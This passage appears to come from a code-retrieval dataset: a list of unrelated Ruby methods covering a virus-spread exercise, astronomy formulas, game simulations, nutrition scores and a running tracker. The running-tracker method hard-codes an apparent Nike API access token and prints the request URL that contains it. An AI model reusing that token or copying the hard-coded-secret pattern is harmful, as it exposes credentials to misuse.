"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n#we can remove this and have it print within virus_effects so that this method does one thing\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def calculate_apr\n payment_ratio = pmt / principal_calculation\n duration = @duration\n f = lambda {|k| (k**(duration + 1) - (k**duration * (payment_ratio + 1)) + payment_ratio)}\n f_deriv = lambda { |k| ((duration + 1) * k**duration) - (duration * (payment_ratio + 1) * k**(duration - 1))}\n\n root = newton_raphson(f, f_deriv, monthly_rate + 1)\n 100 * 12 * (root -1).to_f\n end",
"def find_direction(r_o, c_o, r_q, c_q)\n (Complex(c_o - c_q, r_o - r_q).phase / Math::PI * 4).round\nend",
"def full_moon?\n pom == FULL_MOON\n end",
"def phase_one\n puts \"Phase 1 Starting\".yellow\n counter = 8\n eliminated = []\n while counter > 0\n indexer = 8 - counter\n puts \"Phase one, round #{(indexer+1).to_s}:\".green\n tribe_selected = @borneo.immunity_challenge\n puts \"Tribe selected: #{tribe_selected.to_s}\".green\n puts \"Contestant #{tribe_selected.tribal_council} was eliminated without mercy!\".red\n counter -= 1\n end\n 8 # this is here to pass the test, but not sure it's ver useful beyond that\nend",
"def ma_Sun()\r\n @ta = ( @ajd - DJ00 ) / DJC \r\n# @ma = delta_equinox()[2]\r\n @ma = Celes.falp03(@ta) \r\n end",
"def betting_phases\n @betting_phases ||= [:pre_flop, :flop, :turn, :river]\n end",
"def calc\n calc_spawn_zombie\n calc_move_zombies\n calc_player\n calc_kill_zombie\n end",
"def dec_Sun() \r\n asin( sin(Celes.nut06a(@ajd, 0)[ 1 ] + Celes.obl06(@ajd, 0)) * \r\n sin( al(@ma, @ta, Celes.faom03(@ta)))) \r\n end",
"def calculo \n self.minutos_reales = 5 * 480 #cantidad de OPERARIOS * Jornada de Trabajo(Turnos)\n self.costo_minuto = 89 #Costo Real por minuto\n self.otros_costos = 540 * 89 #Tiempo Total(Minutos) * Costo Real por Minutos\n self.costo_mano_obra = 420 * 5 * 89 # Jornada Minutos * Cantidad Operarios * Costo Real por minutos \n self.manoObraPlaneada = 650.000 * 5 # Salario Total * Cantidad de operarios \n end",
"def chocolate_goal\n chocolate_per_day = 2\n days_in_life = 80 * 365\n\n chocolate_per_day * days_in_life\n end",
"def mill_motor_housing\r\n # # # # # # # # #\r\n end",
"def marathon\n\n\t\tdef km_to_mi (km)\n\t\t\tmiles = km * 0.621371\n\t\tend\n\n\t\tdef percent_complete_training (total_miles, goal_miles)\n\t\t\t@percent_complete = total_miles / 667\n\t\tend\n\n\t\t#@greeting = greetings.shuffle[0]\n\t\t#@firstname = params[:firstname]\n\t\t#@phonenumber = params[:phonenumber]\n\n\t\t#start_date_string = params[:start_date]\n\t\tstart_date_string = \"2015-05-04\"\n\t\t#puts \"START DATE STRING: #{start_date_string}\"\n\t\t@start_date = Date.parse(\"#{start_date_string}\")\n\n\t\t@todays_date = Date.today\n\n\n\t\tdef plan_position_calculator todays_date, plan_start_date\n\t\t\tdays_elapsed = todays_date - plan_start_date #calculate span in days\n\t\t\t@overall_position = days_elapsed.to_i + 1 #difference in days\n\t\t\t@week_position = (days_elapsed.to_i / 7) + 1\n\t\t\t@day_position = ((days_elapsed.to_i) % 7)\n\n\t\t\tputs \"THIS IS THE position on the chart: #{@overall_position}\"\n\t\t\tputs \"THIS IS THE week: #{@week_position}\"\n\t\t\tputs \"THIS IS THE day: #{@day_position}\"\n\n\t\t\t@todays_run = BEGINNER[@week_position][@day_position]\n\t\tend\n\n\t\tplan_position_calculator @todays_date, @start_date\n\n\n\t\t@time_now = Time.now\n\t\t@race_date = Time.new(2015,10,11)\n\n\t\tdef time_until_race todays_date, race_date\n\t\t\tdays_until_race = race_date - todays_date\n\t\t\t@days_until_longint = days_until_race / (60*60*24)\n\t\t\t@total_days_until_race = (@days_until_longint.to_f).ceil\n\t\t\t@weeks_until_race = @total_days_until_race / 7\n\t\t\t@remainder_days_until_race = @total_days_until_race % 7\n\t\tend\n\n\t\ttime_until_race(@time_now, @race_date)\n\n\t\t# Build URL for GET request\n\n\t\t# current_date = Time.now.utc.iso8601[0..9]\n\t\tcurrent_date = @todays_date.to_s\n\t\t# current_date_string = current_date.to_s\n\t\tresults = \"200\"\n\t\tbase = \"https://api.nike.com/me/sport/activities?\"\n\t\taccess_token = \"access_token=lJTUBeEeSeeLBncuWWYWKT03BRG2\"\n\t\tstart_date_param = \"&startDate=#{@start_date}\"\n\t\tend_date_param = \"endDate=#{current_date}\"\n\t\tcount = \"&count=#{results}\"\n\n\t\turl = \"#{base}#{end_date_param}#{start_date_param}&#{access_token}#{count}\"\n\t\tputs url\n\t\tdata = Nokogiri::HTML(open(url))\n\n\t\tparsed = JSON.parse(data)\n\n\t\thash = parsed[\"data\"]\n\n\t\t## Write file with current data\n\n\t\t# newFile = File.write('./dummydata.txt', hash)\n\t\t# puts \"FILE SAVED AS dummydata.txt\"\n\n\t\t@number_of_runs = 0\n\t\t@total_kilos = 0\n\t\t@total_time = 0\n\t\t@average_pace = 0\n\t\t@total_duration = 0\n\n\t\n\t\t#chronic duration\n\t\tdef cd time\n\t\t\tChronicDuration.parse(time)\t\t\t\n\t\tend\n\n\t\t# Loop through hash to get all distances\n\n\t\thash.each do |activity|\n\t\t\tif activity[\"activityType\"] == \"RUN\"\n\t\t\t\t@number_of_runs += 1\n\t\t\t\t@total_kilos += activity[\"metricSummary\"][\"distance\"]\n\t\t\t\t@total_duration += cd(activity[\"metricSummary\"][\"duration\"])\n\t\t\tend\n\t\t\t# @total_time += activity[\"metricSummary\"][\"duration\"]\n\t\t\t# puts \"#{activity[\"metricSummary\"][\"distance\"]} + DATE: #{activity[\"startTime\"]}\"\n\t\t\t# puts \"#{activity[\"metricSummary\"][\"duration\"]}\"\n\t\tend\n\n\t\t#time spent running\n\n\t\t@total_duration = @total_duration.floor\n\t\t@total_hours = (@total_duration / 3600).floor\n\t\t@total_minutes = ((@total_duration % 3600) / 60).floor\n\t\t@total_seconds = @total_duration % 60\n\n\t\t@total_miles = km_to_mi(@total_kilos)\n\n\t\t# Average pace \n\t\t@average_pace = @total_duration / 
@total_miles\n\t\t@average_pace_minutes = (@average_pace / 60).floor\n\t\t@average_pace_seconds = (@average_pace % 60).floor\n\n\t\tputs \"TOTAL DURATION: #{@total_duration}\"\n\t\t#predicted marathon time\n\t\t@marathon_time = @average_pace * 26.2\n\t\t@marathon_pace_seconds = (@marathon_time % 60).floor\n\t\t@marathon_pace_minutes = ((@marathon_time / 60) % 60).ceil\n\t\t@marathon_pace_hours = (@marathon_time / 3600).floor\n\t\t\n\n\t\t# LAST RUN\n\t\t# Reasoning: usually the last activity will be a run. If not, the second to last one will be.\n\n\n\t\tif hash[0][\"activityType\"] == \"RUN\"\n\t\t\t@last_run_distance_km = hash[0][\"metricSummary\"][\"distance\"]\n\t\t\t@last_run_time = hash[0][\"metricSummary\"][\"duration\"]\n\t\t\t@last_run_start_time = hash[0][\"startTime\"][0...-10]\n\t\telse\n\t\t\t@last_run_distance_km = hash[1][\"metricSummary\"][\"distance\"]\n\t\t\t@last_run_time = hash[1][\"metricSummary\"][\"duration\"]\n\t\t\t@last_run_start_time = hash[0][\"startTime\"][0...-10]\n\t\tend\n\n\t\t@last_run_distance = km_to_mi @last_run_distance_km\n\n\t\tputs @last_run_time\n\t\t@last_run_time = cd @last_run_time\n\n\t\t@last_run_pace_seconds = @last_run_time / @last_run_distance\n\t\tpace_seconds = @last_run_pace_seconds % 60\n\t\tpace_minutes = (@last_run_pace_seconds / 60) % 60\n\n\t\t@last_run_pace_formatted = format(\"%02d:%02d\", pace_minutes, pace_seconds)\n\n\t\tseconds = @last_run_time % 60\n\t\tminutes = (@last_run_time / 60) % 60\n\t\thours = @last_run_time / (60 * 60)\n\n\t\t@last_run_time_formatted = format(\"%02d:%02d:%02d\", hours, minutes, seconds) #=> \"01:00:00\"\n\n\t\t#puts \"LAST RUN? #{@last_run_distance_km}, duration: #{@last_run_time}\"\n\n\t\t#LAST 7 Days of Runs\n\n\t\tgon.pace = []\n\t\tgon.runs = []\n\t\tgon.days = []\n\n\t\thash.each do |activity|\n\t\t\tif activity[\"activityType\"] == \"RUN\"\n\t\t\t\tdistance = ((activity[\"metricSummary\"][\"distance\"])*0.621371192).round(2)\n\t\t\t\tgon.runs.push(distance)\n\t\t\t\tduration = (cd(activity[\"metricSummary\"][\"duration\"]).round(2) / distance) / 60\n\t\t\t\tgon.pace.push(duration.round(2))\n\t\t\t\tdate = activity[\"startTime\"][0...-10]\n\t\t\t\tgon.days.push(date)\n\t\t\telse\n\t\t\t\tnext\n\t\t\tend\n\t\tend\n\t\t\n\t\tgon.runs = gon.runs.reverse\n\t\tgon.days = gon.days.reverse\n\t\tgon.pace = gon.pace.reverse\n\n\t\t#convert from kilometers to miles\n\n\t\t\n\n\t\tpercent_complete_training(@total_miles, BEGINNER)\n\n\t\t# Public Shaming section\n\t\t@last_run_parsed = Date.parse(@last_run_start_time)\n\n\t\tputs \"LAST RUN START TIME ======================>>>>> #{@last_run_parsed}\"\n\n\n\t\t# Do I need to run today?\n\n\t\tif @todays_run > 0\n\t\t\trunning_required = true\n\t\t\tputs \"today is a running day\"\n\t\t\tif @last_run_parsed == Date.today\n\t\t\t\tputs \"You ran today, good job\"\n\t\t\t\t@ran_yet = true\n\t\t\t\t@miles_ran_today = @last_run_distance.round(2)\n\t\t\telse\n\t\t\t\tputs \"Paul hasn't ran yet\"\n\t\t\t\t@ran_yet = false\n\t\t\t\t@miles_ran_today = 0\n\t\t\tend\n\t\telse\n\t\t\trunning_required = false\n\t\t\tputs \"today is not a running day\"\n\t\tend\n\n\tif @miles_ran_today == 0\n\t\t@miles_ran_today = \"0\"\n\tend\n\n\t\tputs \"miles ran today: #{@miles_ran_today}\"\n\tend",
"def huella_nutricional\n numero1 = self.calculo_valor_calorico_total\n numero2 = self.calculo_emisiones_diarias\n\n if numero1 < 670\n ienergia = 1\n elsif numero1 <=830\n ienergia = 2\n else\n ienergia = 3\n end\n\n if numero2 < 800\n icarbono = 1\n elsif numero2 <= 1200\n icarbono = 2\n else\n icarbono = 3\n end\n\n media = (ienergia + icarbono)/2\n end",
"def planet_info #(there's no parameter here)\n puts \"#{@name} has #{@orbital} days in one of its years, weighs #{@mass} earth, has #{@moons}, and is #{@distance_from_sun} million miles from the sun.\"\n end",
"def motor\n\t\tbase = outline.linear_extrude(height:(@motor_height/6)*4,center:true).color(\"DimGray\")\n\n\t\tbase+= outline.linear_extrude(height:(@motor_height/6),center:true).translate(z:(@motor_height/1.5+@motor_height/6-0.1)/2).color(\"LightGrey\") \t\t\n\t\tbase+= outline.linear_extrude(height:(@motor_height/6),center:true).translate(z:-(@motor_height/1.5+@motor_height/6-0.1)/2).color(\"LightGrey\") \t\t\n\t\t\n\t\tflange=cylinder(d:@motor_flange_dia,h:@motor_flange_height,center:true).translate(z:(@motor_height+@motor_flange_height-0.01)/2).color(\"LightGrey\")\n\t\t\t\t\n\t\tshaft = cylinder(d:@motor_shaft_OD,h:@motor_shaft_height,center:true).translate(z:(@motor_shaft_height+@motor_height+@motor_flange_height)/2).color(\"WhiteSmoke\")\n\n\t\t# screw holes\n\t\t[-1,1].each do |i|\t\n\t\t\t[-1,1].each do |f|\t\n\t\t\t\tbase-= cylinder(d:@motor_mounting_hole_diam,h:@motor_height+1,center:true).translate(x:i*@motor_mounting_hole_distance/2,y:f*@motor_mounting_hole_distance/2,z:@motor_height-8).color(\"DimGray\")\n\t\t\tend\n\t\tend\n\n\n\t\tmotor = base+flange+shaft\n\t\t# move motor that z is 0\n\t\tmotor.translate(z:@motor_height/2)\t\t\n\tend",
"def phase_type_description\n case phase_type\n when 0 then\n '3 Phase With Neutral, Display L-N'\n when 1 then\n '3 Phase With Neutral, Display L-L'\n when 2 then\n 'Single Split Phase A+B with Neutral, Display L-N'\n when 3 then \n 'Single Phase A to Neutral, Display L-N'\n else\n 'Unknown phase type!'\n end\n end",
"def fortnights ; Duration[self * 1209600] ; end",
"def phase_one\n\tputs \"Phase One: Pre-Merge\".yellow\n\t8.times do\n\t\tlost_tribe = @borneo.immunity_challenge\n\t\tputs \"Tribe #{lost_tribe.to_s.red} has lost this round. They are voting off a member.\"\n\t\teliminated_contestant = lost_tribe.tribal_council\n\t\tputs \"#{eliminated_contestant.to_s.capitalize.red} was voted off.\"\n\tend\n\t#puts \"Phase one ends. 8 contestants were voted off in this phase, and 12 contestants remain in the game.\"\nend",
"def mood \n if self.happiness && self.nausea\n mood = self.happiness - self.nausea\n mood > 0 ? \"happy\" : \"sad\"\n end\n end",
"def mood\n if self.happiness && self.nausea\n mood = self.happiness - self.nausea\n mood > 0 ? \"happy\" : \"sad\"\n end\nend",
"def phase_one\n\tputs divider\n\tputs \"Phase One\"\n\tputs divider\n\t8.times do \n\t\ttribe_immunity_challenge\n\tend\nend",
"def angle_equation_of_time() \r\n delta_orbit() + delta_oblique()\r\n end",
"def create_duration_table(quarter_note_length)\n # Fuck it if the song have two dots or a combination of dots and \"three\"...\n whole = (quarter_note_length * 4)\n dotted_whole = (quarter_note_length * 6)\n whole_triplet = (8 * quarter_note_length / 3)\n half = (quarter_note_length * 2)\n dotted_half = (quarter_note_length * 3)\n half_three = (whole / 3)\n dotted_quarter = (quarter_note_length * 1.5)\n quarter_triplet = (half / 3)\n eight = (quarter_note_length / 2)\n eight_triplet = (quarter_note_length / 3)\n dotted_eight = (3 * quarter_note_length / 4)\n sixteenth = (quarter_note_length / 4)\n sixteenth_triplet = (eight / 3)\n dotted_sixteenth = (3 * quarter_note_length / 8)\n thirty_second = (quarter_note_length / 8)\n thirty_second_triplet = (sixteenth / 3)\n dotted_thirty_second = (3 * quarter_note_length / 16)\n sixty_fourth = (quarter_note_length / 16)\n sixty_fourth_triplet = (thirty_second / 3)\n dotted_sixty_fourth = (3 * quarter_note_length / 32)\n \n @duration_table = {\n whole => 'whole',\n dotted_whole => 'dotted whole',\n whole_triplet => 'whole triplet',\n half => 'half',\n dotted_half => 'dotted half',\n half_three => 'half triplet',\n quarter_note_length => 'quarter',\n dotted_quarter => 'dotted quarter',\n quarter_triplet => 'quarter triplet',\n eight => 'eighth',\n dotted_eight => 'dotted eighth',\n eight_triplet => 'eighth triplet',\n sixteenth => 'sixteenth',\n dotted_sixteenth => 'dotted sixteenth',\n sixteenth_triplet => 'sixteenth triplet',\n thirty_second => 'thirtysecond',\n dotted_thirty_second => 'dotted thirtysecond',\n thirty_second_triplet => 'thirtysecond triplet',\n sixty_fourth => 'sixtyfourth',\n dotted_sixty_fourth => 'dotted sixtyfourth',\n sixty_fourth_triplet => 'sixtyfourth triplet'\n }\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n end",
"def speed_of_spread#in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def phase; end",
"def jpd_noon\r\n $jpd_2000 + jpd_cycle - local_angle\r\nend",
"def attack_phase\n \n #encontra o territorio com mais exercitos\n territorios = get_territories.clone\n territorios.sort! { |a,b| b.troops <=> a.troops }\n \n if territorios[0].troops == 1\n @controller.attack_end(@conn,nil)\n return\n else\n origem = territorios[0]\n\n #encontra territorio inimigo com menos tropas\n alvos = vizinhos_inimigos(origem)\n \n if alvos.size == 0 \n @controller.attack_end(@conn,nil)\n return\n end\n alvos.sort! { |a,b| a.troops <=> b.troops } \n \n alvo = alvos[0]\n \n \n order = {'origin' => origem.id, 'destiny' => alvo.id, 'qtd' => origem.troops-1}\n @controller.attack_order(@conn,order)\n end\n \n \n \n #usar @controller.attack_order() para fazer um ataque\n #usar @controller.attack_end() para terminar fase de ataque\n end",
"def huella_nutricional\n (valor_calorico() + huella_carbono()) / 2\n end",
"def gravity\n @moons.combination(2).to_a.each do |moon_a, moon_b|\n if moon_a[:position][:x] < moon_b[:position][:x]\n moon_a[:velocity][:x] += 1\n moon_b[:velocity][:x] -= 1\n elsif moon_b[:position][:x] < moon_a[:position][:x]\n moon_a[:velocity][:x] -= 1\n moon_b[:velocity][:x] += 1\n end\n\n if moon_a[:position][:y] < moon_b[:position][:y]\n moon_a[:velocity][:y] += 1\n moon_b[:velocity][:y] -= 1\n elsif moon_b[:position][:y] < moon_a[:position][:y]\n moon_a[:velocity][:y] -= 1\n moon_b[:velocity][:y] += 1\n end\n\n if moon_a[:position][:z] < moon_b[:position][:z]\n moon_a[:velocity][:z] += 1\n moon_b[:velocity][:z] -= 1\n elsif moon_b[:position][:z] < moon_a[:position][:z]\n moon_a[:velocity][:z] -= 1\n moon_b[:velocity][:z] += 1\n end\n end\n end",
"def speed_of_spread #in months\r\n # We are still perfecting our formula here. The speed is also affected\r\n # by additional factors we haven't added into this functionality.\r\n speed = 0.0\r\n\r\n if @population_density >= 200\r\n speed += 0.5\r\n elsif @population_density >= 150\r\n speed += 1\r\n elsif @population_density >= 100\r\n speed += 1.5\r\n elsif @population_density >= 50\r\n speed += 2\r\n else\r\n speed += 2.5\r\n end\r\n puts \"#{@state} will lose #{@number_of_deaths} people in this outbreak and will spread across the state in #{speed} months.\\n\\n\"\r\n end",
"def speed_of_spread#in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars , crates\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if population_density >= 200\n speed += 0.5\n elsif population_density >= 150\n speed += 1\n elsif population_density >= 100\n speed += 1.5\n elsif population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars, crates\nend",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars, crates\nend",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars, crates\nend",
"def secret_formula(started)\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n return jelly_beans, jars, crates\nend",
"def spavanac\n input = gets.to_s.split(\" \")\n hours = input[0].to_i\n minutes = input[1].to_i\n remainder = 45 - minutes\n minutes -= 45\n hours_remainder = hours - 1\n if minutes.negative?\n minutes = 60 - remainder\n hours = hours_remainder\n if hours.negative?\n hours = 24 - 1\n end\n end\n puts \"#{hours} #{minutes}\"\nend",
"def phase_sequence\n hash = {\n :idle => method(:idle_key),\n :victory => method(:victory_key),\n :hurt => method(:hurt_key),\n :skill => method(:skill_key),\n :evade => method(:evade_key),\n :return => method(:return_key),\n :escape => method(:escape_key),\n :prepare => method(:prepare_key),\n :intro => method(:intro_key),\n :counter => method(:counter_key),\n :collapse => method(:collapse_key),\n :forced => method(:forced_act),\n :covered => method(:covered_key),\n }\n return hash\n end",
"def huella_ambiental\r\n energia = 0.0\r\n carbono = 0.0\r\n huella = 0.0\r\n if vct < 670 then\r\n energia = 1.0\r\n elsif vct <= 830 then\r\n energia = 2.0\r\n else\r\n energia = 3.0\r\n end\r\n if gei < 800 then\r\n carbono = 1.0\r\n elsif terrenos <= 1200 then\r\n carbono = 2.0\r\n else\r\n carbono = 3.0\r\n end\r\n huella = (energia + carbono)/2\r\n return huella\r\n \r\n end",
"def secret_formula(started)\n# Assigns variables, each building on the other.\n jelly_beans = started * 500\n jars = jelly_beans / 1000\n crates = jars / 100\n# Returns a value that is associated with each variable\n return jelly_beans, jars, crates\nend",
"def sine_to_Earth()\r\n sin(Celes.nut06a(@ajd, 0)[ 1 ] + Celes.obl06(@ajd, 0))\r\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\r\n # We are still perfecting our formula here. The speed is also affected\r\n # by additional factors we haven't added into this functionality.\r\n speed = 0.0\r\n\r\n # if @population_density >= 200\r\n # speed += 0.5\r\n # elsif @population_density >= 150\r\n # speed += 1\r\n # elsif @population_density >= 100\r\n # speed += 1.5\r\n # elsif @population_density >= 50\r\n # speed += 2\r\n # else\r\n # speed += 2.5\r\n # end\r\n\r\n puts \" and will spread across the state in #{@speed} months.\\n\\n\"\r\n\r\n end",
"def get_monoin\n @_100=((@monoin*100)/@peso)\n @ir_100=(@_100/25)*100\n @porcion=((@monoin*@gramos_porciones)/@peso)\n @ir_porcion=(@porcion/25)*100\n [ @monoin , @_100 , @ir_100.round(1) , @porcion , @ir_porcion.round(1) ]\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0 #this can be made into a class attribute allowing a getter\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n #Print method can be removed allowing information to be printed in the driver code\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def secret_formula(started)\r\n\tjelly_beans = started * 500\r\n\tjars = jelly_beans / 1000\r\n\tcrates = jars / 100\r\n\treturn jelly_beans, jars, crates\r\nend",
"def phi\n m = modulus\n (m == 0)? 0 : Math.acos(z/m)\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n # if @population_density >= 200\n # speed += 0.5\n # elsif @population_density >= 150\n # speed += 1\n # elsif @population_density >= 100\n # speed += 1.5\n # elsif @population_density >= 50\n # speed += 2\n # else\n # speed += 2.5\n # end\n\n speed += case @population_density\n when 0...50\n 2.5\n when 50...100\n 2\n when 100...150\n 1.5\n when 150...200\n 1\n else\n 0.5\n end\n \n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def moonIntensity \n \"moonIntensity\" \n end",
"def save_hours\n @day = Schedule.find(params[:monthday])\n\n @pitch.schedule.h0 = hours[0]\n @pitch.schedule.h1 = hours[1]\n @pitch.schedule.h2 = hours[2]\n @pitch.schedule.h3 = hours[3]\n @pitch.schedule.h4 = hours[4]\n @pitch.schedule.h5 = hours[5]\n @pitch.schedule.h6 = hours[6]\n @pitch.schedule.h7 = hours[7]\n @pitch.schedule.h8 = hours[8]\n @pitch.schedule.h9 = hours[9]\n @pitch.schedule.h10 = hours[10]\n @pitch.schedule.h11 = hours[11]\n @pitch.schedule.h12 = hours[12]\n @pitch.schedule.h13 = hours[13]\n @pitch.schedule.h14 = hours[14]\n @pitch.schedule.h15 = hours[15]\n @pitch.schedule.h16 = hours[16]\n @pitch.schedule.h17 = hours[17]\n @pitch.schedule.h18 = hours[18]\n @pitch.schedule.h19 = hours[19]\n @pitch.schedule.h20 = hours[20]\n @pitch.schedule.h21 = hours[21]\n @pitch.schedule.h22 = hours[22]\n @pitch.schedule.h23 = hours[23]\n @pitch.schedule.h24 = hours[24]\n @pitch.schedule.h25 = hours[25]\n @pitch.schedule.h26 = hours[26]\n @pitch.schedule.h27 = hours[27]\n @pitch.schedule.h28 = hours[28]\n @pitch.schedule.h29 = hours[29]\n @pitch.schedule.h30 = hours[30]\n @pitch.schedule.h31 = hours[31]\n @pitch.schedule.h32 = hours[32]\n @pitch.schedule.h33 = hours[33]\n @pitch.schedule.h34 = hours[34]\n @pitch.schedule.h35 = hours[35]\n @pitch.schedule.h36 = hours[36]\n @pitch.schedule.h37 = hours[37]\n @pitch.schedule.h38 = hours[38]\n @pitch.schedule.h39 = hours[39]\n @pitch.schedule.h40 = hours[40]\n @pitch.schedule.h41 = hours[41]\n @pitch.schedule.h42 = hours[42]\n @pitch.schedule.h43 = hours[43]\n @pitch.schedule.h44 = hours[44]\n @pitch.schedule.h45 = hours[45]\n @pitch.schedule.h46 = hours[46]\n @pitch.schedule.h47 = hours[47]\n\n return hours\n end",
"def ordinal_azimuth; end",
"def phase_one\n\tputs \"\\nPhase One\".colorize(:color => :blue, :background => :white)\n\t eliminated_members = []\n\t 8.times do\n\t \tlosing_tribe = @borneo.immunity_challenge\n\t \t# losing_tribe = @borneo.get_losing_tribe(immune_tribe)\n\t \teliminated_member = losing_tribe.tribal_council()\n\t \t# losing_tribe.members.delete(eliminated_member)\n\t \teliminated_members.push(eliminated_member)\n\t end\n\teliminated_members.length\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n case population_density\n when 200..500\n speed += 0.5\n when 150..200\n speed += 1\n when 100..150\n speed += 1.5\n when 50..100\n speed += 2\n when 0..50\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n if @population_density >= 200\n speed += 0.5\n elsif @population_density >= 150\n speed += 1\n elsif @population_density >= 100\n speed += 1.5\n elsif @population_density >= 50\n speed += 2\n else\n speed += 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 0.0\n\n speed += case @population_density.floor\n when 0..49\n 2.5\n when 50..99\n 2\n when 100..149\n 1.5\n when 150..199\n 1\n else\n 0.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n\n speed = 0\n\n speed += case\n when @population_density >= 200\n 0.5\n when @population_density >= 150\n 1\n when @population_density >= 100\n 1.5\n when @population_density >= 50\n 2\n else\n 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n case @population_density \n when 200..150\n speed += 0.5\n when 149..100\n speed += 1\n when 99..50\n speed += 1.5\n else \n speed = 2\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def calcula_nova_posicao(heroi, direcao)\n heroi = heroi.dup\n movimentos = {\n \"W\" => [-1, 0],\n \"S\" => [+1, 0],\n \"A\" => [0, -1],\n \"D\" => [0, +1]\n }\n movimento = movimentos[direcao]\n heroi[0] += movimento[0]\n heroi[1] += movimento[1]\n heroi\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n # speed = 0.0\n\n # if @population_density >= 200\n # speed += 0.5\n # elsif @population_density >= 150\n # speed += 1\n # elsif @population_density >= 100\n # speed += 1.5\n # elsif @population_density >= 50\n # speed += 2\n # else\n # speed += 2.5\n # end\n\n #changed speed var name to months\n #changed the months from a discrete range of numbers to a continuous funtion\n #using the equation for a line to get more accurate timeline\n\n # y = speed\n # x = @population_density\n # slope = -1/75\n # b = 2.5\n\n months = @population_density * (-1.0/75) + 2.5\n if months < 0\n months = 0\n end\n\n puts \" and will spread across the state in #{months} months.\\n\\n\"\n\n end",
"def speed_of_spread#in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n\n if @population_density >= 200\n speed = 0.5\n elsif @population_density >= 150\n speed = 1\n elsif @population_density >= 100\n speed = 1.5\n elsif @population_density >= 50\n speed = 2\n else\n speed = 2.5\n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end",
"def zodiacPartners(sign)\n return [(sign+4)%12,(sign+8)%12]\nend",
"def zodiacPartners(sign)\n return [(sign+4)%12,(sign+8)%12]\nend",
"def speed_of_spread #in months\n # We are still perfecting our formula here. The speed is also affected\n # by additional factors we haven't added into this functionality.\n speed = 2.5\n\n case @population_density \n when 150..200\n speed += 0.5\n when 100..149\n speed += 1\n when 50..99\n speed += 1.5\n else \n speed \n end\n\n puts \" and will spread across the state in #{speed} months.\\n\\n\"\n\n end"
] | [
